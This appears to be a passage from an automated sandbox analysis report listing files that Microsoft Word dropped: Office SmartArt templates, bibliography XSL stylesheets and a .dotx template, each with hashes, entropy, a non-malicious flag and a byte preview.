    Category:dropped
    Size (bytes):256
    Entropy (8bit):3.464918006641019
    Encrypted:false
    SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
    MD5:93149E194021B37162FD86684ED22401
    SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
    SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
    SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft Word 2007+
    Category:dropped
    Size (bytes):51826
    Entropy (8bit):5.541375256745271
    Encrypted:false
    SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
    MD5:2AB22AC99ACFA8A82742E774323C0DBD
    SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
    SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
    SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
    Malicious:false
    Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):258
    Entropy (8bit):3.4692172273306268
    Encrypted:false
    SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
    MD5:C1B36A0547FB75445957A619201143AC
    SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
    SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
    SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):7370
    Entropy (8bit):7.9204386289679745
    Encrypted:false
    SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
    MD5:586CEBC1FAC6962F9E36388E5549FFE9
    SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
    SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
    SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
    Malicious:false
    Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):286
    Entropy (8bit):3.538396048757031
    Encrypted:false
    SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
    MD5:149948E41627BE5DC454558E12AF2DA4
    SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
    SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
    SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):250983
    Entropy (8bit):5.057714239438731
    Encrypted:false
    SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
    MD5:F883B260A8D67082EA895C14BF56DD56
    SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
    SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
    SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):256
    Entropy (8bit):3.4842773155694724
    Encrypted:false
    SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
    MD5:923D406B2170497AD4832F0AD3403168
    SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
    SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
    SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Category:dropped
    Size (bytes):11380
    Entropy (8bit):7.891971054886943
    Encrypted:false
    SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
    MD5:C9F9364C659E2F0C626AC0D0BB519062
    SHA1:C4036C576074819309D03BB74C188BF902D1AE00
    SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
    SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
    Malicious:false
    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):252
    Entropy (8bit):3.48087342759872
    Encrypted:false
    SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
    MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
    SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
    SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
    SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):4326
    Entropy (8bit):7.821066198539098
    Encrypted:false
    SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
    MD5:D32E93F7782B21785424AE2BEA62B387
    SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
    SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
    SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
    Malicious:false
    Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):302
    Entropy (8bit):3.537169234443227
    Encrypted:false
    SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
    MD5:9C00979164E78E3B890E56BE2DF00666
    SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
    SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
    SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):217137
    Entropy (8bit):5.068335381017074
    Encrypted:false
    SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
    MD5:3BF8591E1D808BCCAD8EE2B822CC156B
    SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
    SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
    SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):254
    Entropy (8bit):3.4721586910685547
    Encrypted:false
    SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
    MD5:4DD225E2A305B50AF39084CE568B8110
    SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
    SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
    SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):4243
    Entropy (8bit):7.824383764848892
    Encrypted:false
    SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
    MD5:7BC0A35807CD69C37A949BBD51880FF5
    SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
    SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
    SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
    Malicious:false
    Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):286
    Entropy (8bit):3.4670546921349774
    Encrypted:false
    SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
    MD5:3D52060B74D7D448DC733FFE5B92CB52
    SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
    SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
    SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Category:dropped
    Size (bytes):5630
    Entropy (8bit):7.87271654296772
    Encrypted:false
    SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
    MD5:2F8998AA9CF348F1D6DE16EAB2D92070
    SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
    SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
    SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
    Malicious:false
    Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):278
    Entropy (8bit):3.5280239200222887
    Encrypted:false
    SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
    MD5:877A8A960B2140E3A0A2752550959DB9
    SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
    SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
    SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):268317
    Entropy (8bit):5.05419861997223
    Encrypted:false
    SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
    MD5:51D32EE5BC7AB811041F799652D26E04
    SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
    SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
    SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):264
    Entropy (8bit):3.4866056878458096
    Encrypted:false
    SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
    MD5:6C489D45F3B56845E68BE07EA804C698
    SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
    SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
    SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Category:dropped
    Size (bytes):6448
    Entropy (8bit):7.897260397307811
    Encrypted:false
    SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
    MD5:42A840DC06727E42D42C352703EC72AA
    SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
